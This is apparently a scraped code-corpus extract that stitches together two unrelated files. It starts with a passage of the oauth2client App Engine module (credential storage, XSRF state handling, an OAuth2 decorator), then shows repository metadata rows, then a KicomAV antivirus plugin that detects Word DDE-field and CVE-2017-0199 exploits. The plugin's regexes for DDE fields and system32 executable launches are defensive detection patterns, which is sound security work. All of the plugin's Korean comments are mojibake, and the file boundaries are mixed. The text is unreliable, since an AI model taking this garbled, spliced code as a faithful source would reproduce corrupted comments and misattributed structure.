# TODO(dhermes): Turn this into a JsonProperty and overhaul the Credentials
# and subclass mechanics to use new_from_dict, to_dict,
# from_dict, etc.
class CredentialsNDBProperty(ndb.BlobProperty):
"""App Engine NDB datastore Property for Credentials.
Serves the same purpose as the DB CredentialsProperty, but for NDB models.
Since CredentialsProperty stores data as a blob and this inherits from
BlobProperty, the data in the datastore will be the same as in the DB case.
Utility property that allows easy storage and retrieval of Credentials and
subclasses.
"""
def _validate(self, value):
"""Validates a value as a proper credentials object.
Args:
value: A value to be set on the property.
Raises:
TypeError if the value is not an instance of Credentials.
"""
logger.info('validate: Got type %s', type(value))
if value is not None and not isinstance(value, Credentials):
raise TypeError('Property %s must be convertible to a credentials '
'instance; received: %s.' % (self._name, value))
def _to_base_type(self, value):
"""Converts our validated value to a JSON serialized string.
Args:
value: A value to be set in the datastore.
Returns:
A JSON serialized version of the credential, else '' if value is None.
"""
if value is None:
return ''
else:
return value.to_json()
def _from_base_type(self, value):
"""Converts our stored JSON string back to the desired type.
Args:
value: A value from the datastore to be converted to the desired type.
Returns:
A deserialized Credentials (or subclass) object, else None if the
value can't be parsed.
"""
if not value:
return None
try:
# Uses the from_json method of the implied class of value
credentials = Credentials.new_from_json(value)
except ValueError:
credentials = None
return credentials
class StorageByKeyName(Storage):
"""Store and retrieve a credential to and from the App Engine datastore.
This Storage helper presumes the Credentials have been stored as a
CredentialsProperty or CredentialsNDBProperty on a datastore model class, and
that entities are stored by key_name.
"""
@util.positional(4)
def __init__(self, model, key_name, property_name, cache=None, user=None):
"""Constructor for Storage.
Args:
model: db.Model or ndb.Model, model class
key_name: string, key name for the entity that has the credentials
property_name: string, name of the property that is a CredentialsProperty
or CredentialsNDBProperty.
cache: memcache, a write-through cache to put in front of the datastore.
If the model you are using is an NDB model, using a cache will be
redundant since the model uses an instance cache and memcache for you.
user: users.User object, optional. Can be used to grab user ID as a
key_name if no key name is specified.
"""
if key_name is None:
if user is None:
raise ValueError('StorageByKeyName called with no key name or user.')
key_name = user.user_id()
self._model = model
self._key_name = key_name
self._property_name = property_name
self._cache = cache
def _is_ndb(self):
"""Determine whether the model of the instance is an NDB model.
Returns:
Boolean indicating whether or not the model is an NDB or DB model.
"""
# issubclass will fail if one of the arguments is not a class, only need
# worry about new-style classes since ndb and db models are new-style
if isinstance(self._model, type):
if ndb is not None and issubclass(self._model, ndb.Model):
return True
elif issubclass(self._model, db.Model):
return False
raise TypeError('Model class not an NDB or DB model: %s.' % (self._model,))
def _get_entity(self):
"""Retrieve entity from datastore.
Uses a different model method for db or ndb models.
Returns:
Instance of the model corresponding to the current storage object
and stored using the key name of the storage object.
"""
if self._is_ndb():
return self._model.get_by_id(self._key_name)
else:
return self._model.get_by_key_name(self._key_name)
def _delete_entity(self):
"""Delete entity from datastore.
Attempts to delete using the key_name stored on the object, whether or not
the given key is in the datastore.
"""
if self._is_ndb():
ndb.Key(self._model, self._key_name).delete()
else:
entity_key = db.Key.from_path(self._model.kind(), self._key_name)
db.delete(entity_key)
def locked_get(self):
"""Retrieve Credential from datastore.
Returns:
oauth2client.Credentials
"""
credentials = None
if self._cache:
json = self._cache.get(self._key_name)
if json:
credentials = Credentials.new_from_json(json)
if credentials is None:
entity = self._get_entity()
if entity is not None:
credentials = getattr(entity, self._property_name)
if self._cache:
self._cache.set(self._key_name, credentials.to_json())
if credentials and hasattr(credentials, 'set_store'):
credentials.set_store(self)
return credentials
def locked_put(self, credentials):
"""Write a Credentials to the datastore.
Args:
credentials: Credentials, the credentials to store.
"""
entity = self._model.get_or_insert(self._key_name)
setattr(entity, self._property_name, credentials)
entity.put()
if self._cache:
self._cache.set(self._key_name, credentials.to_json())
def locked_delete(self):
"""Delete Credential from datastore."""
if self._cache:
self._cache.delete(self._key_name)
self._delete_entity()
class CredentialsModel(db.Model):
"""Storage for OAuth 2.0 Credentials
Storage of the model is keyed by the user.user_id().
"""
credentials = CredentialsProperty()
if ndb is not None:
class CredentialsNDBModel(ndb.Model):
"""NDB Model for storage of OAuth 2.0 Credentials
Since this model uses the same kind as CredentialsModel and has a property
which can serialize and deserialize Credentials correctly, it can be used
interchangeably with a CredentialsModel to access, insert and delete the
same entities. This simply provides an NDB model for interacting with the
same data the DB model interacts with.
Storage of the model is keyed by the user.user_id().
"""
credentials = CredentialsNDBProperty()
@classmethod
def _get_kind(cls):
"""Return the kind name for this class."""
return 'CredentialsModel'
def _build_state_value(request_handler, user):
"""Composes the value for the 'state' parameter.
Packs the current request URI and an XSRF token into an opaque string that
can be passed to the authentication server via the 'state' parameter.
Args:
request_handler: webapp.RequestHandler, The request.
user: google.appengine.api.users.User, The current user.
Returns:
The state value as a string.
"""
uri = request_handler.request.url
token = xsrfutil.generate_token(xsrf_secret_key(), user.user_id(),
action_id=str(uri))
return uri + ':' + token
def _parse_state_value(state, user):
"""Parse the value of the 'state' parameter.
Parses the value and validates the XSRF token in the state parameter.
Args:
state: string, The value of the state parameter.
user: google.appengine.api.users.User, The current user.
Raises:
InvalidXsrfTokenError: if the XSRF token is invalid.
Returns:
The redirect URI.
"""
uri, token = state.rsplit(':', 1)
if not xsrfutil.validate_token(xsrf_secret_key(), token, user.user_id(),
action_id=uri):
raise InvalidXsrfTokenError()
return uri
class OAuth2Decorator(object):
"""Utility for making OAuth 2.0 easier.
Instantiate and then use with oauth_required or oauth_aware
as decorators on webapp.RequestHandler methods.
Example:
decorator = OAuth2Decorator(
client_id='837...ent.com',
client_secret='Qh...wwI',
scope='https://www.googleapis.com/auth/plus')
class MainHandler(webapp.RequestHandler):
@decorator.oauth_required
def get(self):
http = decorator.http()
# http is authorized with the user's Credentials and can be used
# in API calls
"""
def set_credentials(self, credentials):
self._tls.credentials = credentials
def get_credentials(self):
"""A thread local Credentials object.
Returns:
A client.Credentials object, or None if credentials hasn't been set in
this thread yet, which may happen when calling has_credentials inside
oauth_aware.
"""
return getattr(self._tls, 'credentials', None)
credentials = property(get_credentials, set_credentials)
def set_flow(self, flow):
self._tls.flow = flow
def get_flow(self):
"""A thread local Flow object.
Returns:
A credentials.Flow object, or None if the flow hasn't been set in this
thread yet, which happens in _create_flow() since Flows are created
lazily.
"""
return getattr(self._tls, 'flow', None)
flow = property(get_flow, set_flow)
@util.positional(4)
def __init__(self, client_id, client_secret, scope,
auth_uri=GOOGLE_AUTH_URI,
token_uri=GOOGLE_TOKEN_URI,
revoke_uri=GOOGLE_REVOKE_URI,
user_agent=None,
message=None,
callback_path='/oauth2callback',
token_response_param=None,
_storage_class=StorageByKeyName,
_credentials_class=CredentialsModel,
_credentials_property_name='credentials',
**kwargs):
"""Constructor for OAuth2Decorator
Args:
client_id: string, client identifier.
client_secret: string client secret.
scope: string or iterable of strings, scope(s) of the credentials being
requested.
auth_uri: string, URI for authorization endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
token_uri: string, URI for token endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
revoke_uri: string, URI for revoke endpoint. For convenience
defaults to Google's endpoints but any OAuth 2.0 provider can be used.
user_agent: string, User agent of your application, default to None.
message: Message to display if there are problems with the OAuth 2.0
configuration. The message may contain HTML and will be presented on the
web interface for any method that uses the decorator.
callback_path: string, The absolute path to use as the callback URI. Note
that this must match up with the URI given when registering the
application in the APIs Console.
token_response_param: string. If provided, the full JSON response
to the access token request will be encoded and included in this query
parameter in the callback URI. This is useful with providers (e.g.
wordpress.com) that include extra fields that the client may want.
_storage_class: "Protected" keyword argument not typically provided to
this constructor. A storage class to aid in storing a Credentials object
for a user in the datastore. Defaults to StorageByKeyName.
_credentials_class: "Protected" keyword argument not typically provided to
this constructor. A db or ndb Model class to hold credentials. Defaults
to CredentialsModel.
_credentials_property_name: "Protected" keyword argument not typically
provided to this constructor. A string indicating the name of the field
on the _credentials_class where a Credentials object will be stored.
Defaults to 'credentials'.
**kwargs: dict, Keyword arguments are be passed along as kwargs to the
OAuth2WebServerFlow constructor.
"""
self._tls = threading.local()
self.flow = None
self.credentials = None
self._client_id = client_id
self._client_secret = client_secret
self._scope = util.scopes_to_string(scope)
self._auth_uri = auth_uri
self._token_uri = token_uri
self._revoke_uri = revoke_uri
self._user_agent = user_agent
self._kwargs = kwargs
self._message = message
self._in_error = False
self._callback_path = callback_path
self._token_response_param = token_response_param
self._storage_class = _storage_class
self._credentials_class = _credentials_class
self._credentials_property_name = _credentials_property_name
def _display_error_message(self, request_handler):
request_handler.response.out.write('<html><body>')
request_handler.response.out.write(_safe_html(self._message))
request_handler.response.out.write('</body></html>')
def oauth_required(self, method):
"""Decorator that starts the OAuth 2.0 dance.
Starts the OAuth dance for the logged in user if they haven't already
granted access for this application.
Args:
method: callable, to be decorated method of a webapp.RequestHandler
instance.
"""
def check_oauth(request_handler, *args, **kwargs):
if self._in_error:
self._display_error_message(request_handler)
return
user = users.get_current_user()
# Don't use @login_decorator as this could be used in a POST request.
if not user:
request_handler.redirect(users.create_login_url(
request_handler.request.uri))
return
self._create_flow(request_handler)
# Store the request URI in 'state' so we can use it later
self.flow.params['state'] = _build_state_value(request_handler, user)
self.credentials = self._storage_class(
self._credentials_class, None,
self._credentials_property_name, user=user).get()
if not self.has_credentials():
return request_handler.redirect(self.authorize_url())
try:
resp = method(request_handler, *args, **kwargs)
except AccessTokenRefreshError:
return request_handler.redirect(self.authorize_url())
finally:
self.credentials = None
return resp
return check_oauth
def _create_flow(self, request_handler):
"""Create the Flow object.
The Flow is calculated lazily since we don't know where this app is
running until it receives a request, at which point redirect_uri can be
calculated and then the Flow object can be constructed.
Args:
request_handler: webapp.RequestHandler, the request handler.
"""
if self.flow is None:
redirect_uri = request_handler.request.relative_url(
self._callback_path) # Usually /oauth2callback
self.flow = OAuth2WebServerFlow(self._client_id, self._client_secret,
self._scope, redirect_uri=redirect_uri,
user_agent=self._user_agent,
auth_uri=self._auth_uri,
token_uri=self._token_uri,
revoke_uri=self._revoke_uri,
**self._kwargs)
def oauth_aware(self, method):
"""Decorator that sets up for OAuth 2.0 dance, but doesn't do it.
Does all the setup for the OAuth dance, but doesn't initiate it.
This decorator is useful if you want to create a page that knows
whether or not the user has granted access to this application.
From within a method decorated with @oauth_aware the has_credentials()
and authorize_url() methods can be called.
Args:
method: callable, to be decorated method of a webapp.RequestHandler
instance.
"""
def setup_oauth(request_handler, *args, **kwargs):
if self._in_error:
self._display_error_message(request_handler)
return
user = users.get_current_user()
# Don't use @login_decorator as this could be used in a POST request.
if not user:
request_handler.redirect(users.create_login_url(
request_handler.request.uri))
return
self._create_flow(request_handler)
self.flow.params['state'] = _build_state_value(request_handler, user)
self.credentials = self._storage_class(
self._credentials_class, None,
self._credentials_property_name, user=user).get()
try:
resp = method(request_handler, *args, **kwargs)
finally:
self.credentials = None
return resp
return setup_oauth
def has_credentials(self):
"""True if for the logged in user there are valid access Credentials.
Must only be called from with a webapp.RequestHandler subclassed method
that had been decorated with either @oauth_required or @oauth_aware.
"""
return self.credentials is not None and not self.credentials.invalid
def authorize_url(self):
"""Returns the URL to start the OAuth dance.
Must only be called from with a webapp.RequestHandler subclassed method
that had been decorated with either @oauth_required or @oauth_aware.
"""
url = self.flow.step1_get_authorize_url()
return str(url)
def http(self):
"""Returns an authorized http instance.
Must only be called from within an @oauth_required decorated method, or
from within an @oauth_aware decorated method where has_credentials()
returns True.
"""
return self.credentials.authorize(httplib2.Http())
@property
def callback_path(self):
"""The absolute path where the callback will occur.
Note this is the absolute path, not the absolute URI, that will be
calculated by the decorator at runtime. See callback_handler() for how this
should be used.
Returns:
The callback path as a string.
"""
return self._callback_path
def callback_handler(self):
"""RequestHandler for the OAuth 2.0 redirect callback.
Usage:
app = webapp.WSGIApplication([
('/index', MyIndexHandler),
...,
(decorator.callback_path, decorator.callback_handler())
])
Returns:
A webapp.RequestHandler that handles the redirect back from the
server during the OAuth 2.0 dance.
"""
decorator = self
class OAuth2Handler(webapp.RequestHandler):
"""Handler for the redirect_uri of the OAuth 2.0 dance."""
@login_required
def get(self):
error = self.request.get('error')
if error:
errormsg = self.request.get('error_description', error)
self.response.out.write(
'The authorization request failed: %s' % _safe_html(errormsg))
else:
user = users.get_current_user()
decorator._create_flow(self)
credentials = decorator.flow.step2_exchange(self.request.params)
decorator._storage_class(
decorator._credentials_class, None,
decorator._credentials_property_name, user=user).put(credentials)
redirect_uri = _parse_state_value(str(self.request.get('state')),
user)
if decorator._token_response_param and credentials.token_response:
resp_json = simplejson.dumps(credentials.token_response)
redirect_uri = util._add_query_parameter(
redirect_uri, decorator._token_response_param, resp_json)
self.redirect(redirect_uri)
return OAuth2Handler
def callback_application(self):
"""WSGI application for handling the OAuth 2.0 redirect callback.
If you need finer grained control use `callback_handler` which returns just
the webapp.RequestHandler.
Returns:
A webapp.WSGIApplication that handles the redirect back from the
server during the OAuth 2.0 dance.
"""
return webapp.WSGIApplication([
(self.callback_path, self.callback_handler())
])
class OAuth2DecoratorFromClientSecrets(OAuth2Decorator):
"""An OAuth2Decorator that builds from a clientsecrets file.
Uses a clientsecrets file as the source for all the information when
constructing an OAuth2Decorator.
Example:
decorator = OAuth2DecoratorFromClientSecrets(
os.path.join(os.path.dirname(__file__), 'client_secrets.json')
scope='https://www.googleapis.com/auth/plus')
class MainHandler(webapp.RequestHandler):
@decorator.oauth_required
def get(self):
http = decorator.http()
# http is authorized with the user's Credentials and can be used
# in API calls
"""
@util.positional(3)
def __init__(self, filename, scope, message=None, cache=None):
"""Constructor
Args:
filename: string, File name of client secrets.
scope: string or iterable of strings, scope(s) of the credentials being
requested.
message: string, A friendly string to display to the user if the
clientsecrets file is missing or invalid. The message may contain HTML
and will be presented on the web interface for any method that uses the
decorator.
cache: An optional cache service client that implements get() and set()
methods. See clientsecrets.loadfile() for details.
"""
client_type, client_info = clientsecrets.loadfile(filename, cache=cache)
if client_type not in [
clientsecrets.TYPE_WEB, clientsecrets.TYPE_INSTALLED]:
raise InvalidClientSecretsError(
'OAuth2Decorator doesn\'t support this OAuth 2.0 flow.')
constructor_kwargs = {
'auth_uri': client_info['auth_uri'],
'token_uri': client_info['token_uri'],
'message': message,
}
revoke_uri = client_info.get('revoke_uri')
if revoke_uri is not None:
constructor_kwargs['revoke_uri'] = revoke_uri
super(OAuth2DecoratorFromClientSecrets, self).__init__(
client_info['client_id'], client_info['client_secret'],
scope, **constructor_kwargs)
if message is not None:
self._message = message
else:
self._message = 'Please configure your application for OAuth 2.0.'
@util.positional(2)
def oauth2decorator_from_clientsecrets(filename, scope,
message=None, cache=None):
"""Creates an OAuth2Decorator populated from a clientsecrets file.
Args:
filename: string, File name of client secrets.
scope: string or list of strings, scope(s) of the credentials being
requested.
message: string, A friendly string to display to the user if the
clientsecrets file is missing or invalid. The message may contain HTML and
will be presented on the web interface for any method that uses the
decorator.
cache: An optional cache service client that implements get() and set()
methods. See clientsecrets.loadfile() for details.
Returns: An OAuth2Decorator
"""
return OAuth2DecoratorFromClientSecrets(filename, scope,
message=message, cache=cache)
|
apache-2.0
|
hanul93/kicomav
|
Engine/plugins/dde.py
|
1
|
8396
|
# -*- coding:utf-8 -*-
# Author: Kei Choi([email protected])
import os
import re
import zipfile
import kernel
# -------------------------------------------------------------------------
# zip ํ์ผ์ ํน๋ณํ ํ์ผ๋ช
์ ์์ถ ํด์ ํ์ฌ ๋ฐ์ดํฐ๋ฅผ ๋ฆฌํดํ๋ค.
# -------------------------------------------------------------------------
def get_zip_data(zip_name, filename):
data = None
try:
zfile = zipfile.ZipFile(zip_name) # zip ํ์ผ ์ด๊ธฐ
names = zfile.namelist()
for name in names:
if name.lower() == filename:
data = zfile.read(name)
break
zfile.close()
except zipfile.BadZipfile:
pass
return data
# -------------------------------------------------------------------------
# ์คํ ํ์ผ๋ช
์ด ํฌํจ๋ ๋ฌธ์์ด์ธ์ง ํ์ธํ๋ค.
# -------------------------------------------------------------------------
def is_include_exe(s):
exts = ['.exe', '.cmd', '.vbs']
s = s.lower()
for ext in exts:
if s.find(ext) != -1:
return True
return False
def InstrSub(obj):
text = obj.groups()[0]
off = text.find('QUOTE') # QUOTE๊ฐ ์กด์ฌํ๋?
if off != -1:
t = text[off+5:].strip().split(' ')
text = ''.join([chr(int(x)) for x in t])
return text
# -------------------------------------------------------------------------
# KavMain ํด๋์ค
# -------------------------------------------------------------------------
class KavMain:
# ---------------------------------------------------------------------
# init(self, plugins_path)
# ํ๋ฌ๊ทธ์ธ ์์ง์ ์ด๊ธฐํ ํ๋ค.
# ์ธ๋ ฅ๊ฐ : plugins_path - ํ๋ฌ๊ทธ์ธ ์์ง์ ์์น
# verbose - ๋๋ฒ๊ทธ ๋ชจ๋ (True or False)
# ๋ฆฌํด๊ฐ : 0 - ์ฑ๊ณต, 0 ์ด์ธ์ ๊ฐ - ์คํจ
# ---------------------------------------------------------------------
def init(self, plugins_path, verbose=False): # ํ๋ฌ๊ทธ์ธ ์์ง ์ด๊ธฐํ
s = r'"begin"(.+?)"end"'
self.p_dde_text = re.compile(s, re.IGNORECASE)
s = r'<w:fldSimple\s+?w:instr=\s*?"(.+?)"\s*>'
self.p_instr = re.compile(s, re.IGNORECASE)
s = r'\bdde(auto)?\b'
self.p_dde = re.compile(s, re.IGNORECASE)
s = r'\\system32\b(.+)\.exe'
self.p_cmd = re.compile(s, re.IGNORECASE)
s = r'\<[\d\D]+?\>'
self.p_tag = re.compile(s)
s = r'\x13\s*dde(auto)?\b[^\x00]+'
self.p_dde2 = re.compile(s, re.IGNORECASE)
return 0 # ํ๋ฌ๊ทธ์ธ ์์ง ์ด๊ธฐํ ์ฑ๊ณต
# ---------------------------------------------------------------------
# uninit(self)
# ํ๋ฌ๊ทธ์ธ ์์ง์ ์ข
๋ฃํ๋ค.
# ๋ฆฌํด๊ฐ : 0 - ์ฑ๊ณต, 0 ์ด์ธ์ ๊ฐ - ์คํจ
# ---------------------------------------------------------------------
def uninit(self): # ํ๋ฌ๊ทธ์ธ ์์ง ์ข
๋ฃ
return 0 # ํ๋ฌ๊ทธ์ธ ์์ง ์ข
๋ฃ ์ฑ๊ณต
# ---------------------------------------------------------------------
# scan(self, filehandle, filename, fileformat)
# ์
์ฑ์ฝ๋๋ฅผ ๊ฒ์ฌํ๋ค.
# ์
๋ ฅ๊ฐ : filehandle - ํ์ผ ํธ๋ค
# filename - ํ์ผ ์ด๋ฆ
# fileformat - ํ์ผ ํฌ๋งท
# filename_ex - ํ์ผ ์ด๋ฆ (์์ถ ๋ด๋ถ ํ์ผ ์ด๋ฆ)
# ๋ฆฌํด๊ฐ : (์
์ฑ์ฝ๋ ๋ฐ๊ฒฌ ์ฌ๋ถ, ์
์ฑ์ฝ๋ ์ด๋ฆ, ์
์ฑ์ฝ๋ ID) ๋ฑ๋ฑ
# ---------------------------------------------------------------------
def scan(self, filehandle, filename, fileformat, filename_ex): # ์
์ฑ์ฝ๋ ๊ฒ์ฌ
try:
# ๋ฏธ๋ฆฌ ๋ถ์๋ ํ์ผ ํฌ๋งท์ค์ OLE ํฌ๋งท์ด ์๋๊ฐ?
if 'ff_ooxml' in fileformat:
if fileformat['ff_ooxml'] == 'docx':
# docx ํ์ผ์ ๊ฒฝ์ฐ DDE ์
์ฑ์ฝ๋ ์กด์ฌ ๊ฐ๋ฅ์ฑ ์์
data = get_zip_data(filename, 'word/document.xml')
if data:
if self.__scan_dde_docx(data):
return True, 'Exploit.MSWord.DDE.a', 0, kernel.INFECTED
elif self.__scan_cve_2017_0199_docx(data):
return True, 'Exploit.MSWord.CVE-2017-0199', 0, kernel.INFECTED
elif filename_ex.lower() == 'worddocument':
data = filehandle
if self.__scan_dde_doc(data):
return True, 'Exploit.MSWord.DDE.b', 0, kernel.INFECTED
except IOError:
pass
# ์
์ฑ์ฝ๋๋ฅผ ๋ฐ๊ฒฌํ์ง ๋ชปํ์์ ๋ฆฌํดํ๋ค.
return False, '', -1, kernel.NOT_FOUND
# ---------------------------------------------------------------------
# disinfect(self, filename, malware_id)
# ์
์ฑ์ฝ๋๋ฅผ ์น๋ฃํ๋ค.
# ์
๋ ฅ๊ฐ : filename - ํ์ผ ์ด๋ฆ
# : malware_id - ์น๋ฃํ ์
์ฑ์ฝ๋ ID
# ๋ฆฌํด๊ฐ : ์
์ฑ์ฝ๋ ์น๋ฃ ์ฌ๋ถ
# ---------------------------------------------------------------------
def disinfect(self, filename, malware_id): # ์
์ฑ์ฝ๋ ์น๋ฃ
try:
# ์
์ฑ์ฝ๋ ์ง๋จ ๊ฒฐ๊ณผ์์ ๋ฐ์ ID ๊ฐ์ด 0์ธ๊ฐ?
if malware_id == 0:
os.remove(filename) # ํ์ผ ์ญ์
return True # ์น๋ฃ ์๋ฃ ๋ฆฌํด
except IOError:
pass
return False # ์น๋ฃ ์คํจ ๋ฆฌํด
# ---------------------------------------------------------------------
# listvirus(self)
# ์ง๋จ/์น๋ฃ ๊ฐ๋ฅํ ์
์ฑ์ฝ๋์ ๋ฆฌ์คํธ๋ฅผ ์๋ ค์ค๋ค.
# ๋ฆฌํด๊ฐ : ์
์ฑ์ฝ๋ ๋ฆฌ์คํธ
# ---------------------------------------------------------------------
def listvirus(self): # ์ง๋จ ๊ฐ๋ฅํ ์
์ฑ์ฝ๋ ๋ฆฌ์คํธ
vlist = list() # ๋ฆฌ์คํธํ ๋ณ์ ์ ์ธ
# ์ง๋จ/์น๋ฃํ๋ ์
์ฑ์ฝ๋ ์ด๋ฆ ๋ฑ๋ก
vlist.append('Exploit.MSWord.DDE.a')
vlist.append('Exploit.MSWord.DDE.b')
vlist.append('Exploit.MSWord.CVE-2017-0199')
return vlist
# ---------------------------------------------------------------------
# getinfo(self)
# ํ๋ฌ๊ทธ์ธ ์์ง์ ์ฃผ์ ์ ๋ณด๋ฅผ ์๋ ค์ค๋ค. (์ ์์, ๋ฒ์ , ...)
# ๋ฆฌํด๊ฐ : ํ๋ฌ๊ทธ์ธ ์์ง ์ ๋ณด
# ---------------------------------------------------------------------
def getinfo(self): # ํ๋ฌ๊ทธ์ธ ์์ง์ ์ฃผ์ ์ ๋ณด
info = dict() # ์ฌ์ ํ ๋ณ์ ์ ์ธ
info['author'] = 'Kei Choi' # ์ ์์
info['version'] = '1.0' # ๋ฒ์
info['title'] = 'DDE Scan Engine' # ์์ง ์ค๋ช
info['kmd_name'] = 'dde' # ์์ง ํ์ผ ์ด๋ฆ
info['sig_num'] = len(self.listvirus()) # ์ง๋จ/์น๋ฃ ๊ฐ๋ฅํ ์
์ฑ์ฝ๋ ์
return info
# ---------------------------------------------------------------------
# DDE ์
์ฑ์ฝ๋๋ฅผ ์ง๋จํ๋ค.
# ---------------------------------------------------------------------
def __scan_dde_docx(self, data):
# TEXT ์์ญ์ ์ถ์ถํ๋ค.
texts = self.p_dde_text.findall(data)
if len(texts):
buf = ''
for text in texts:
# ์์ชฝ begin Tag ์ ๊ฑฐ
off = text.find('>')
text = text[off + 1:]
# ๋ค์ชฝ end Tag ์ ๊ฑฐ
off = text.rfind('<')
text = text[:off]
# instr๋ฅผ ์ฒ๋ฆฌํ๋ค.
text = self.p_instr.sub(InstrSub, text)
# ๋ชจ๋ Tag ์ญ์
buf += self.p_tag.sub('', text) + '\n'
# print buf
if len(buf):
if self.p_dde.search(buf) and self.p_cmd.search(buf):
return True
return False
def __scan_dde_doc(self, data):
s = self.p_dde2.search(data)
if s:
buf = s.group()
if len(buf):
if self.p_dde.search(buf) and self.p_cmd.search(buf):
return True
return False
# ---------------------------------------------------------------------
# CVE-2017-0199 ์
์ฑ์ฝ๋๋ฅผ ์ง๋จํ๋ค.
# ---------------------------------------------------------------------
def __scan_cve_2017_0199_docx(self, data):
if data.find('<o:OLEObject Type="Link" ProgID="Word.Document.8"') != -1:
return True
return False
|
gpl-2.0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.